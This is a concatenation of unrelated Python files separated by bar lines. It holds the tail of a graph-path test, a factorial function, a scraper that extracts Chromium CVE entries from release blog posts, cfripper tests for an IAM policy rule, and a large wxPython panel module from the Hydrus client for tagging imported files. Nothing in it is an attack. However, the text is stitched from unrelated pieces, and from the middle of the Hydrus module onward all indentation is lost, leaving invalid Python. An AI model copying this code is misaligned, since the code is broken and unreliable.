        b.make_consistent('AAA')
        cdb = b.build()

        # when
        paths = list(Interactor(cdb).all_simple_paths(links=links))

        # then
        assert ['AAACCCT', 'AAAGCCCA', 'AAAGCCCT'] == sorted([str(p.seq) for p in paths])
|
#!/usr/bin/env python3
"""my product1
"""
def my_product1(n):
    """Return the product 1 * 2 * ... * n (n factorial; 1 for n <= 0).

    >>> my_product1(3)
    6
    >>> my_product1(10)
    3628800
    """
    result = 1
    for factor in range(1, n + 1):
        result *= factor
    return result
if __name__ == '__main__':
    # Run the doctest examples embedded in my_product1's docstring.
    import doctest
    doctest.testmod()
|
# SPDX-License-Identifier: MIT
import json
import re
import click
import requests
from lxml import etree
# Matches Chromium's four-component version numbers, e.g. "96.0.4664.45".
# Raw string avoids the invalid-escape-sequence warning that `"\."` in a
# regular string literal triggers (SyntaxWarning on recent Python); the
# pattern value itself is unchanged.
CHROMIUM_VERSION_REGEX = r"[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
@click.command()
@click.argument("url", nargs=-1)
@click.option(
    "--output",
    type=click.File("w"),
    default=click.get_text_stream("stdout"),
    help="Output file with CVEs in JSON format (defaults to stdout)",
)
def chromium(url, output):
    """Extract CVEs for Chromium from their release blog posts"""
    cves = []
    for advisory_url in url:
        advisory = requests.get(advisory_url).content
        advisory = etree.fromstring(advisory, etree.HTMLParser())
        # The first version-like <span> on the page is taken as the fixed
        # Chromium version.
        new_version = advisory.xpath(
            f'string(//span[re:test(text(), "{CHROMIUM_VERSION_REGEX}")]/text())',
            namespaces={"re": "http://exslt.org/regular-expressions"},
        )
        new_version = re.search(CHROMIUM_VERSION_REGEX, new_version).group()
        cve_descriptions = advisory.xpath('//span[starts-with(text(), "CVE-")]/text()')
        # Split "CVE-…: <type> in <component>" into three parts.
        # NOTE(review): lines in a different format yield more/fewer parts
        # and will raise on the 3-tuple unpack below — confirm acceptable
        # for this ad-hoc scraper.
        cve_descriptions = [
            re.split(": | in ", description.strip(". "))
            for description in cve_descriptions
        ]
        # NOTE(review): the comprehension variable `type` shadows the
        # builtin within this expression.
        cves += [
            {
                "name": cve.strip(),
                "type": "Unknown",
                # Severity is the preceding sibling span of the CVE span.
                "severity": advisory.xpath(
                    f'normalize-space(//span[starts-with(text(), "{cve}")]/preceding-sibling::span[1]/text())'
                ),
                "vector": "Remote",
                "description": f"A {type.lower()} security issue has been found in the {component} component of the Chromium browser engine before version {new_version}.",
                "references": [
                    advisory_url,
                    advisory.xpath(
                        f'string(//span[starts-with(text(), "{cve}")]/preceding-sibling::a[1]/@href)'
                    ),
                ],
                "notes": None,
            }
            for cve, type, component in cve_descriptions
        ]
    output.write(json.dumps(cves, indent=2, ensure_ascii=False))
|
from pycfmodel.model.cf_model import CFModel
from pytest import fixture
from cfripper.rules import PolicyOnUserRule
from tests.utils import get_cfmodel_from
@fixture()
def good_template():
    # Resolved CFModel expected to pass PolicyOnUserRule.
    return get_cfmodel_from("rules/PolicyOnUserRule/good_template.json").resolve()
@fixture()
def bad_template():
    # Resolved CFModel expected to fail PolicyOnUserRule.
    return get_cfmodel_from("rules/PolicyOnUserRule/bad_template.json").resolve()
def test_no_failures_are_raised(good_template):
    """A compliant template yields a valid result with no failures."""
    outcome = PolicyOnUserRule(None).invoke(good_template)

    assert outcome.valid
    assert len(outcome.failed_rules) == 0
    assert len(outcome.failed_monitored_rules) == 0
def test_failures_are_raised(bad_template: CFModel):
    """A policy attached directly to a user must be flagged as a failure."""
    outcome = PolicyOnUserRule(None).invoke(bad_template)

    assert not outcome.valid
    assert len(outcome.failed_rules) == 1
    assert len(outcome.failed_monitored_rules) == 0
    failure = outcome.failed_rules[0]
    assert failure.rule == "PolicyOnUserRule"
    assert failure.reason == "IAM policy Policy should not apply directly to users. Should be on group"
|
import ClientConstants as CC
import ClientGUIACDropdown
import ClientGUICommon
import ClientGUIListBoxes
import ClientGUIListCtrl
import ClientGUIScrolledPanels
import ClientGUIScrolledPanelsEdit
import ClientGUITopLevelWindows
import ClientImporting
import ClientImportOptions
import collections
import HydrusConstants as HC
import HydrusData
import HydrusGlobals as HG
import HydrusTags
import HydrusText
import os
import re
import wx
import wx.adv
class FileImportOptionsButton( ClientGUICommon.BetterButton ):
    """Button that summarises a file-import-options object in its tooltip
    and opens a modal edit dialog when clicked."""

    def __init__( self, parent, file_import_options, update_callable = None ):
        # update_callable, when given, is notified of every options change.
        ClientGUICommon.BetterButton.__init__( self, parent, 'file import options', self._EditOptions )
        self._file_import_options = file_import_options
        self._update_callable = update_callable
        self._SetToolTip()

    def _EditOptions( self ):
        # Show the modal edit dialog; commit the new options only on OK.
        with ClientGUITopLevelWindows.DialogEdit( self, 'edit file import options' ) as dlg:
            panel = ClientGUIScrolledPanelsEdit.EditFileImportOptions( dlg, self._file_import_options )
            dlg.SetPanel( panel )
            if dlg.ShowModal() == wx.ID_OK:
                file_import_options = panel.GetValue()
                self._SetValue( file_import_options )

    def _SetToolTip( self ):
        # Tooltip mirrors the current options' summary text.
        self.SetToolTip( self._file_import_options.GetSummary() )

    def _SetValue( self, file_import_options ):
        # Store, refresh the tooltip, then notify the owner if registered.
        self._file_import_options = file_import_options
        self._SetToolTip()
        if self._update_callable is not None:
            self._update_callable( self._file_import_options )

    def GetValue( self ):
        return self._file_import_options

    def SetValue( self, file_import_options ):
        self._SetValue( file_import_options )
class FilenameTaggingOptionsPanel( wx.Panel ):
    def __init__( self, parent, service_key, tag_update_callable, filename_tagging_options = None, present_for_accompanying_file_list = False ):
        """Panel hosting a 'simple' and an 'advanced' filename-tagging page
        in a notebook; both pages report tag changes via tag_update_callable."""
        if filename_tagging_options is None:
            # pull from an options default
            filename_tagging_options = ClientImportOptions.FilenameTaggingOptions()
        wx.Panel.__init__( self, parent )
        self._service_key = service_key
        self._notebook = wx.Notebook( self )
        # eventually these will take 'regexoptions' or whatever object and 'showspecificfiles' as well
        self._simple_panel = self._SimplePanel( self._notebook, self._service_key, tag_update_callable, filename_tagging_options, present_for_accompanying_file_list )
        self._advanced_panel = self._AdvancedPanel( self._notebook, self._service_key, tag_update_callable, filename_tagging_options, present_for_accompanying_file_list )
        self._notebook.AddPage( self._simple_panel, 'simple', select = True )
        self._notebook.AddPage( self._advanced_panel, 'advanced' )
        vbox = wx.BoxSizer( wx.VERTICAL )
        vbox.Add( self._notebook, CC.FLAGS_EXPAND_SIZER_BOTH_WAYS )
        self.SetSizer( vbox )
    def GetFilenameTaggingOptions( self ):
        # Build a fresh options object and let both pages write their
        # current state into it.
        filename_tagging_options = ClientImportOptions.FilenameTaggingOptions()
        self._advanced_panel.UpdateFilenameTaggingOptions( filename_tagging_options )
        self._simple_panel.UpdateFilenameTaggingOptions( filename_tagging_options )
        return filename_tagging_options
    def GetTags( self, index, path ):
        """Collect tags from both pages for the file at (index, path), clean
        them, then apply the sibling/parent/censorship managers in order."""
        tags = set()
        tags.update( self._simple_panel.GetTags( index, path ) )
        tags.update( self._advanced_panel.GetTags( index, path ) )
        tags = HydrusTags.CleanTags( tags )
        siblings_manager = HG.client_controller.GetManager( 'tag_siblings' )
        parents_manager = HG.client_controller.GetManager( 'tag_parents' )
        tag_censorship_manager = HG.client_controller.GetManager( 'tag_censorship' )
        tags = siblings_manager.CollapseTags( self._service_key, tags )
        tags = parents_manager.ExpandTags( self._service_key, tags )
        tags = tag_censorship_manager.FilterTags( self._service_key, tags )
        return tags
def SetSelectedPaths( self, paths ):
self._simple_panel.SetSelectedPaths( paths )
class _AdvancedPanel( wx.Panel ):
def __init__( self, parent, service_key, refresh_callable, filename_tagging_options, present_for_accompanying_file_list ):
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._refresh_callable = refresh_callable
self._present_for_accompanying_file_list = present_for_accompanying_file_list
#
self._quick_namespaces_panel = ClientGUICommon.StaticBox( self, 'quick namespaces' )
self._quick_namespaces_list = ClientGUIListCtrl.BetterListCtrl( self._quick_namespaces_panel, 'quick_namespaces', 4, 20, [ ( 'namespace', 12 ), ( 'regex', -1 ) ], self._ConvertQuickRegexDataToListCtrlTuples, delete_key_callback = self.DeleteQuickNamespaces, activation_callback = self.EditQuickNamespaces )
self._add_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'add' )
self._add_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventAddQuickNamespace )
self._add_quick_namespace_button.SetMinSize( ( 20, -1 ) )
self._edit_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'edit' )
self._edit_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventEditQuickNamespace )
self._edit_quick_namespace_button.SetMinSize( ( 20, -1 ) )
self._delete_quick_namespace_button = wx.Button( self._quick_namespaces_panel, label = 'delete' )
self._delete_quick_namespace_button.Bind( wx.EVT_BUTTON, self.EventDeleteQuickNamespace )
self._delete_quick_namespace_button.SetMinSize( ( 20, -1 ) )
#
self._regexes_panel = ClientGUICommon.StaticBox( self, 'regexes' )
self._regexes = wx.ListBox( self._regexes_panel )
self._regexes.Bind( wx.EVT_LISTBOX_DCLICK, self.EventRemoveRegex )
self._regex_box = wx.TextCtrl( self._regexes_panel, style=wx.TE_PROCESS_ENTER )
self._regex_box.Bind( wx.EVT_TEXT_ENTER, self.EventAddRegex )
self._regex_shortcuts = ClientGUICommon.RegexButton( self._regexes_panel )
self._regex_intro_link = wx.adv.HyperlinkCtrl( self._regexes_panel, id = -1, label = 'a good regex introduction', url = 'http://www.aivosto.com/vbtips/regex.html' )
self._regex_practise_link = wx.adv.HyperlinkCtrl( self._regexes_panel, id = -1, label = 'regex practise', url = 'http://regexr.com/3cvmf' )
#
self._num_panel = ClientGUICommon.StaticBox( self, '#' )
self._num_base = wx.SpinCtrl( self._num_panel, min = -10000000, max = 10000000, size = ( 60, -1 ) )
self._num_base.SetValue( 1 )
self._num_base.Bind( wx.EVT_SPINCTRL, self.EventRecalcNum )
self._num_step = wx.SpinCtrl( self._num_panel, min = -1000000, max = 1000000, size = ( 60, -1 ) )
self._num_step.SetValue( 1 )
self._num_step.Bind( wx.EVT_SPINCTRL, self.EventRecalcNum )
self._num_namespace = wx.TextCtrl( self._num_panel, size = ( 100, -1 ) )
self._num_namespace.Bind( wx.EVT_TEXT, self.EventNumNamespaceChanged )
if not self._present_for_accompanying_file_list:
self._num_panel.Hide()
#
( quick_namespaces, regexes ) = filename_tagging_options.AdvancedToTuple()
self._quick_namespaces_list.AddDatas( quick_namespaces )
for regex in regexes:
self._regexes.Append( regex )
#
button_box = wx.BoxSizer( wx.HORIZONTAL )
button_box.Add( self._add_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
button_box.Add( self._edit_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
button_box.Add( self._delete_quick_namespace_button, CC.FLAGS_EXPAND_BOTH_WAYS )
self._quick_namespaces_panel.Add( self._quick_namespaces_list, CC.FLAGS_EXPAND_BOTH_WAYS )
self._quick_namespaces_panel.Add( button_box, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
#
self._regexes_panel.Add( self._regexes, CC.FLAGS_EXPAND_BOTH_WAYS )
self._regexes_panel.Add( self._regex_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._regexes_panel.Add( self._regex_shortcuts, CC.FLAGS_LONE_BUTTON )
self._regexes_panel.Add( self._regex_intro_link, CC.FLAGS_LONE_BUTTON )
self._regexes_panel.Add( self._regex_practise_link, CC.FLAGS_LONE_BUTTON )
#
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( wx.StaticText( self._num_panel, label = '# base/step: ' ), CC.FLAGS_VCENTER )
hbox.Add( self._num_base, CC.FLAGS_VCENTER )
hbox.Add( self._num_step, CC.FLAGS_VCENTER )
self._num_panel.Add( hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( wx.StaticText( self._num_panel, label = '# namespace: ' ), CC.FLAGS_VCENTER )
hbox.Add( self._num_namespace, CC.FLAGS_EXPAND_BOTH_WAYS )
self._num_panel.Add( hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
second_vbox = wx.BoxSizer( wx.VERTICAL )
second_vbox.Add( self._regexes_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
second_vbox.Add( self._num_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
#
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( self._quick_namespaces_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( second_vbox, CC.FLAGS_EXPAND_SIZER_BOTH_WAYS )
self.SetSizer( hbox )
def _ConvertQuickRegexDataToListCtrlTuples( self, data ):
( namespace, regex ) = data
display_tuple = ( namespace, regex )
sort_tuple = ( namespace, regex )
return ( display_tuple, sort_tuple )
def DeleteQuickNamespaces( self ):
import ClientGUIDialogs
with ClientGUIDialogs.DialogYesNo( self, 'Remove all selected?' ) as dlg:
if dlg.ShowModal() == wx.ID_YES:
self._quick_namespaces_list.DeleteSelected()
self._refresh_callable()
def EditQuickNamespaces( self ):
data_to_edit = self._quick_namespaces_list.GetData( only_selected = True )
for old_data in data_to_edit:
( namespace, regex ) = old_data
import ClientGUIDialogs
with ClientGUIDialogs.DialogInputNamespaceRegex( self, namespace = namespace, regex = regex ) as dlg:
if dlg.ShowModal() == wx.ID_OK:
( new_namespace, new_regex ) = dlg.GetInfo()
new_data = ( new_namespace, new_regex )
if new_data != old_data:
self._quick_namespaces_list.DeleteDatas( ( old_data, ) )
self._quick_namespaces_list.AddDatas( ( new_data, ) )
self._refresh_callable()
def EventAddRegex( self, event ):
regex = self._regex_box.GetValue()
if regex != '':
try:
re.compile( regex, flags = re.UNICODE )
except Exception as e:
text = 'That regex would not compile!'
text += os.linesep * 2
text += HydrusData.ToUnicode( e )
wx.MessageBox( text )
return
self._regexes.Append( regex )
self._regex_box.Clear()
self._refresh_callable()
def EventAddQuickNamespace( self, event ):
import ClientGUIDialogs
with ClientGUIDialogs.DialogInputNamespaceRegex( self ) as dlg:
if dlg.ShowModal() == wx.ID_OK:
( namespace, regex ) = dlg.GetInfo()
data = ( namespace, regex )
self._quick_namespaces_list.AddDatas( ( data, ) )
self._refresh_callable()
def EventDeleteQuickNamespace( self, event ):
self.DeleteQuickNamespaces()
def EventEditQuickNamespace( self, event ):
self.EditQuickNamespaces()
def EventNumNamespaceChanged( self, event ):
self._refresh_callable()
def EventRecalcNum( self, event ):
self._refresh_callable()
def EventRemoveRegex( self, event ):
selection = self._regexes.GetSelection()
if selection != wx.NOT_FOUND:
if len( self._regex_box.GetValue() ) == 0: self._regex_box.SetValue( self._regexes.GetString( selection ) )
self._regexes.Delete( selection )
self._refresh_callable()
def GetTags( self, index, path ):
tags = set()
num_namespace = self._num_namespace.GetValue()
if num_namespace != '':
num_base = self._num_base.GetValue()
num_step = self._num_step.GetValue()
tag_num = num_base + index * num_step
tags.add( num_namespace + ':' + str( tag_num ) )
return tags
def UpdateFilenameTaggingOptions( self, filename_tagging_options ):
quick_namespaces = self._quick_namespaces_list.GetData()
regexes = self._regexes.GetStrings()
filename_tagging_options.AdvancedSetTuple( quick_namespaces, regexes )
class _SimplePanel( wx.Panel ):
def __init__( self, parent, service_key, refresh_callable, filename_tagging_options, present_for_accompanying_file_list ):
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._refresh_callable = refresh_callable
self._present_for_accompanying_file_list = present_for_accompanying_file_list
#
self._tags_panel = ClientGUICommon.StaticBox( self, 'tags for all' )
self._tags = ClientGUIListBoxes.ListBoxTagsStringsAddRemove( self._tags_panel, self._service_key, self.TagsRemoved )
expand_parents = True
self._tag_box = ClientGUIACDropdown.AutoCompleteDropdownTagsWrite( self._tags_panel, self.EnterTags, expand_parents, CC.LOCAL_FILE_SERVICE_KEY, service_key )
self._tags_paste_button = ClientGUICommon.BetterButton( self._tags_panel, 'paste tags', self._PasteTags )
#
self._single_tags_panel = ClientGUICommon.StaticBox( self, 'tags just for selected files' )
self._paths_to_single_tags = collections.defaultdict( set )
self._single_tags = ClientGUIListBoxes.ListBoxTagsStringsAddRemove( self._single_tags_panel, self._service_key, self.SingleTagsRemoved )
self._single_tags_paste_button = ClientGUICommon.BetterButton( self._single_tags_panel, 'paste tags', self._PasteSingleTags )
expand_parents = True
self._single_tag_box = ClientGUIACDropdown.AutoCompleteDropdownTagsWrite( self._single_tags_panel, self.EnterTagsSingle, expand_parents, CC.LOCAL_FILE_SERVICE_KEY, service_key )
self.SetSelectedPaths( [] )
if not self._present_for_accompanying_file_list:
self._single_tags_panel.Hide()
#
self._checkboxes_panel = ClientGUICommon.StaticBox( self, 'misc' )
self._load_from_txt_files_checkbox = wx.CheckBox( self._checkboxes_panel, label = 'try to load tags from neighbouring .txt files' )
txt_files_help_button = ClientGUICommon.BetterBitmapButton( self._checkboxes_panel, CC.GlobalBMPs.help, self._ShowTXTHelp )
txt_files_help_button.SetToolTip( 'Show help regarding importing tags from .txt files.' )
self._filename_namespace = wx.TextCtrl( self._checkboxes_panel )
self._filename_namespace.SetMinSize( ( 100, -1 ) )
self._filename_checkbox = wx.CheckBox( self._checkboxes_panel, label = 'add filename? [namespace]' )
self._dir_namespace_1 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_1.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_1 = wx.CheckBox( self._checkboxes_panel, label = 'add first directory? [namespace]' )
self._dir_namespace_2 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_2.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_2 = wx.CheckBox( self._checkboxes_panel, label = 'add second directory? [namespace]' )
self._dir_namespace_3 = wx.TextCtrl( self._checkboxes_panel )
self._dir_namespace_3.SetMinSize( ( 100, -1 ) )
self._dir_checkbox_3 = wx.CheckBox( self._checkboxes_panel, label = 'add third directory? [namespace]' )
#
( tags_for_all, load_from_neighbouring_txt_files, add_filename, add_first_directory, add_second_directory, add_third_directory ) = filename_tagging_options.SimpleToTuple()
self._tags.AddTags( tags_for_all )
self._load_from_txt_files_checkbox.SetValue( load_from_neighbouring_txt_files )
( add_filename_boolean, add_filename_namespace ) = add_filename
self._filename_checkbox.SetValue( add_filename_boolean )
self._filename_namespace.SetValue( add_filename_namespace )
( dir_1_boolean, dir_1_namespace ) = add_first_directory
self._dir_checkbox_1.SetValue( dir_1_boolean )
self._dir_namespace_1.SetValue( dir_1_namespace )
( dir_2_boolean, dir_2_namespace ) = add_second_directory
self._dir_checkbox_2.SetValue( dir_2_boolean )
self._dir_namespace_2.SetValue( dir_2_namespace )
( dir_3_boolean, dir_3_namespace ) = add_third_directory
self._dir_checkbox_3.SetValue( dir_3_boolean )
self._dir_namespace_3.SetValue( dir_3_namespace )
#
self._tags_panel.Add( self._tags, CC.FLAGS_EXPAND_BOTH_WAYS )
self._tags_panel.Add( self._tag_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._tags_panel.Add( self._tags_paste_button, CC.FLAGS_EXPAND_PERPENDICULAR )
self._single_tags_panel.Add( self._single_tags, CC.FLAGS_EXPAND_BOTH_WAYS )
self._single_tags_panel.Add( self._single_tag_box, CC.FLAGS_EXPAND_PERPENDICULAR )
self._single_tags_panel.Add( self._single_tags_paste_button, CC.FLAGS_EXPAND_PERPENDICULAR )
txt_hbox = wx.BoxSizer( wx.HORIZONTAL )
txt_hbox.Add( self._load_from_txt_files_checkbox, CC.FLAGS_EXPAND_BOTH_WAYS )
txt_hbox.Add( txt_files_help_button, CC.FLAGS_VCENTER )
filename_hbox = wx.BoxSizer( wx.HORIZONTAL )
filename_hbox.Add( self._filename_checkbox, CC.FLAGS_VCENTER )
filename_hbox.Add( self._filename_namespace, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_1 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_1.Add( self._dir_checkbox_1, CC.FLAGS_VCENTER )
dir_hbox_1.Add( self._dir_namespace_1, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_2 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_2.Add( self._dir_checkbox_2, CC.FLAGS_VCENTER )
dir_hbox_2.Add( self._dir_namespace_2, CC.FLAGS_EXPAND_BOTH_WAYS )
dir_hbox_3 = wx.BoxSizer( wx.HORIZONTAL )
dir_hbox_3.Add( self._dir_checkbox_3, CC.FLAGS_VCENTER )
dir_hbox_3.Add( self._dir_namespace_3, CC.FLAGS_EXPAND_BOTH_WAYS )
self._checkboxes_panel.Add( txt_hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( filename_hbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_1, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_2, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
self._checkboxes_panel.Add( dir_hbox_3, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
hbox = wx.BoxSizer( wx.HORIZONTAL )
hbox.Add( self._tags_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( self._single_tags_panel, CC.FLAGS_EXPAND_BOTH_WAYS )
hbox.Add( self._checkboxes_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
self.SetSizer( hbox )
#
self._load_from_txt_files_checkbox.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._filename_namespace.Bind( wx.EVT_TEXT, self.EventRefresh )
self._filename_checkbox.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_1.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_1.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_2.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_2.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
self._dir_namespace_3.Bind( wx.EVT_TEXT, self.EventRefresh )
self._dir_checkbox_3.Bind( wx.EVT_CHECKBOX, self.EventRefresh )
def _GetTagsFromClipboard( self ):
text = HG.client_controller.GetClipboardText()
try:
tags = HydrusText.DeserialiseNewlinedTexts( text )
tags = HydrusTags.CleanTags( tags )
return tags
except:
raise Exception( 'I could not understand what was in the clipboard' )
def _PasteTags( self ):
try:
tags = self._GetTagsFromClipboard()
except Exception as e:
wx.MessageBox( HydrusData.ToUnicode( e ) )
return
self.EnterTags( tags )
def _PasteSingleTags( self ):
try:
tags = self._GetTagsFromClipboard()
except Exception as e:
wx.MessageBox( HydrusData.ToUnicode( e ) )
return
self.EnterTagsSingle( tags )
def _ShowTXTHelp( self ):
message = 'If you would like to add custom tags with your files, add a .txt file beside the file like so:'
message += os.linesep * 2
message += 'my_file.jpg'
message += os.linesep
message += 'my_file.jpg.txt'
message += os.linesep * 2
message += 'And include your tags inside the .txt file in a newline-separated list (if you know how to script, generating these files automatically from another source of tags can save a lot of time!).'
message += os.linesep * 2
message += 'Make sure you preview the results in the table above to be certain everything is parsing correctly. Until you are comfortable with this, you should test it on just one or two files.'
wx.MessageBox( message )
def EnterTags( self, tags ):
tag_parents_manager = HG.client_controller.GetManager( 'tag_parents' )
parents = set()
for tag in tags:
some_parents = tag_parents_manager.GetParents( self._service_key, tag )
parents.update( some_parents )
if len( tags ) > 0:
self._tags.AddTags( tags )
self._tags.AddTags( parents )
self._refresh_callable()
def EnterTagsSingle( self, tags ):
tag_parents_manager = HG.client_controller.GetManager( 'tag_parents' )
parents = set()
for tag in tags:
some_parents = tag_parents_manager.GetParents( self._service_key, tag )
parents.update( some_parents )
if len( tags ) > 0:
self._single_tags.AddTags( tags )
self._single_tags.AddTags( parents )
for path in self._selected_paths:
current_tags = self._paths_to_single_tags[ path ]
current_tags.update( tags )
current_tags.update( parents )
self._refresh_callable()
def EventRefresh( self, event ):
self._refresh_callable()
def GetTags( self, index, path ):
tags = set()
if path in self._paths_to_single_tags:
tags.update( self._paths_to_single_tags[ path ] )
return tags
def SingleTagsRemoved( self, tags ):
for path in self._selected_paths:
current_tags = self._paths_to_single_tags[ path ]
current_tags.difference_update( tags )
self._refresh_callable()
def SetSelectedPaths( self, paths ):
self._selected_paths = paths
single_tags = set()
if len( paths ) > 0:
for path in self._selected_paths:
if path in self._paths_to_single_tags:
single_tags.update( self._paths_to_single_tags[ path ] )
self._single_tag_box.Enable()
self._single_tags_paste_button.Enable()
else:
self._single_tag_box.Disable()
self._single_tags_paste_button.Disable()
self._single_tags.SetTags( single_tags )
def TagsRemoved( self, tag ):
self._refresh_callable()
def UpdateFilenameTaggingOptions( self, filename_tagging_options ):
tags_for_all = self._tags.GetTags()
load_from_neighbouring_txt_files = self._load_from_txt_files_checkbox.GetValue()
add_filename_boolean = self._filename_checkbox.GetValue()
add_filename_namespace = self._filename_namespace.GetValue()
add_filename = ( add_filename_boolean, add_filename_namespace )
dir_1_boolean = self._dir_checkbox_1.GetValue()
dir_1_namespace = self._dir_namespace_1.GetValue()
add_first_directory = ( dir_1_boolean, dir_1_namespace )
dir_2_boolean = self._dir_checkbox_2.GetValue()
dir_2_namespace = self._dir_namespace_2.GetValue()
add_second_directory = ( dir_2_boolean, dir_2_namespace )
dir_3_boolean = self._dir_checkbox_3.GetValue()
dir_3_namespace = self._dir_namespace_3.GetValue()
add_third_directory = ( dir_3_boolean, dir_3_namespace )
filename_tagging_options.SimpleSetTuple( tags_for_all, load_from_neighbouring_txt_files, add_filename, add_first_directory, add_second_directory, add_third_directory )
class EditLocalImportFilenameTaggingPanel( ClientGUIScrolledPanels.EditPanel ):
    """
    Edit panel that maps a list of local file paths to per-service tags.
    Shows one ListBook page per writable tag repository plus the local tag
    service; each page pairs a file list with a FilenameTaggingOptionsPanel.
    """
    
    def __init__( self, parent, paths ):
        """
        :param parent: parent wx window
        :param paths: the file paths being imported
        """
        ClientGUIScrolledPanels.EditPanel.__init__( self, parent )
        self._paths = paths
        self._tag_repositories = ClientGUICommon.ListBook( self )
        #
        # one page per tag repository the user can post mappings to
        services = HG.client_controller.services_manager.GetServices( ( HC.TAG_REPOSITORY, ) )
        for service in services:
            if service.HasPermission( HC.CONTENT_TYPE_MAPPINGS, HC.PERMISSION_ACTION_CREATE ):
                service_key = service.GetServiceKey()
                name = service.GetName()
                self._tag_repositories.AddPageArgs( name, service_key, self._Panel, ( self._tag_repositories, service_key, paths ), {} )
        # the local tag service always gets a page
        # NOTE(review): the raw service key is used as the page's display name
        # here, unlike the repositories above which use service.GetName() --
        # looks intentional for the local service, but verify.
        page = self._Panel( self._tag_repositories, CC.LOCAL_TAG_SERVICE_KEY, paths )
        name = CC.LOCAL_TAG_SERVICE_KEY
        self._tag_repositories.AddPage( name, name, page )
        default_tag_repository_key = HC.options[ 'default_tag_repository' ]
        self._tag_repositories.Select( default_tag_repository_key )
        #
        vbox = wx.BoxSizer( wx.VERTICAL )
        vbox.Add( self._tag_repositories, CC.FLAGS_EXPAND_BOTH_WAYS )
        self.SetSizer( vbox )
    
    def GetValue( self ):
        """
        Return { path : { service_key : tags } } merged across all pages the
        user actually opened (GetActivePages).
        """
        paths_to_tags = collections.defaultdict( dict )
        for page in self._tag_repositories.GetActivePages():
            ( service_key, page_of_paths_to_tags ) = page.GetInfo()
            for ( path, tags ) in page_of_paths_to_tags.items(): paths_to_tags[ path ][ service_key ] = tags
        return paths_to_tags
    
    class _Panel( wx.Panel ):
        """One ListBook page: a path/tags preview list plus tagging options for one service."""
        
        def __init__( self, parent, service_key, paths ):
            wx.Panel.__init__( self, parent )
            self._service_key = service_key
            self._paths = paths
            self._paths_list = ClientGUIListCtrl.BetterListCtrl( self, 'paths_to_tags', 25, 40, [ ( '#', 4 ), ( 'path', 40 ), ( 'tags', -1 ) ], self._ConvertDataToListCtrlTuples )
            self._paths_list.Bind( wx.EVT_LIST_ITEM_SELECTED, self.EventItemSelected )
            self._paths_list.Bind( wx.EVT_LIST_ITEM_DESELECTED, self.EventItemSelected )
            #
            self._filename_tagging_panel = FilenameTaggingOptionsPanel( self, self._service_key, self.ScheduleRefreshFileList, present_for_accompanying_file_list = True )
            # pending debounced refresh job, if any
            self._schedule_refresh_file_list_job = None
            #
            # i.e. ( index, path )
            self._paths_list.AddDatas( list( enumerate( self._paths ) ) )
            #
            vbox = wx.BoxSizer( wx.VERTICAL )
            vbox.Add( self._paths_list, CC.FLAGS_EXPAND_BOTH_WAYS )
            vbox.Add( self._filename_tagging_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
            self.SetSizer( vbox )
        
        def _ConvertDataToListCtrlTuples( self, data ):
            """List ctrl adapter: render (index, path) with its current tags; 1-based # column."""
            ( index, path ) = data
            tags = self._GetTags( index, path )
            pretty_index = HydrusData.ConvertIntToPrettyString( index + 1 )
            pretty_path = path
            pretty_tags = ', '.join( tags )
            display_tuple = ( pretty_index, pretty_path, pretty_tags )
            sort_tuple = ( index, path, tags )
            return ( display_tuple, sort_tuple )
        
        def _GetTags( self, index, path ):
            """Compute the sorted tag list for one file from the current options panel state."""
            filename_tagging_options = self._filename_tagging_panel.GetFilenameTaggingOptions()
            tags = filename_tagging_options.GetTags( self._service_key, path )
            tags.update( self._filename_tagging_panel.GetTags( index, path ) )
            tags = list( tags )
            tags.sort()
            return tags
        
        def EventItemSelected( self, event ):
            """Selection changed: tell the options panel which paths are selected."""
            paths = [ path for ( index, path ) in self._paths_list.GetData( only_selected = True ) ]
            self._filename_tagging_panel.SetSelectedPaths( paths )
            event.Skip()
        
        def GetInfo( self ):
            """Return ( service_key, { path : tags } ) for every listed file."""
            paths_to_tags = { path : self._GetTags( index, path ) for ( index, path ) in self._paths_list.GetData() }
            return ( self._service_key, paths_to_tags )
        
        def RefreshFileList( self ):
